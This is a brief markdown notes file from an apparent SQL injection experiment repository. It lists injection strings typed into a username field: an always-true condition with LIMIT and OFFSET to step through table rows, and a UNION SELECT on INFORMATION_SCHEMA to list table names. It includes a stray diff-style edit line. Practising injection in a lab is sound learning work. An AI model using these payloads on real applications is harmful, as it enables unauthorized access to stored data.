Valentine-Efagene/sql-injection-experiment/commands.md

   1. username => 'or '1'='1' LIMIT 1 OFFSET 2 -- '
   2. OFFSET is the key value here.
 This way, you can go through the whole table.

-- Get first table name, using DB name obtained above
+- Get first table name, using DB name obtained below

   1. username => fsdfs' UNION SELECT table_name, 1 FROM INFORMATION_SCHEMA.tables WHERE table_schema='test' -- '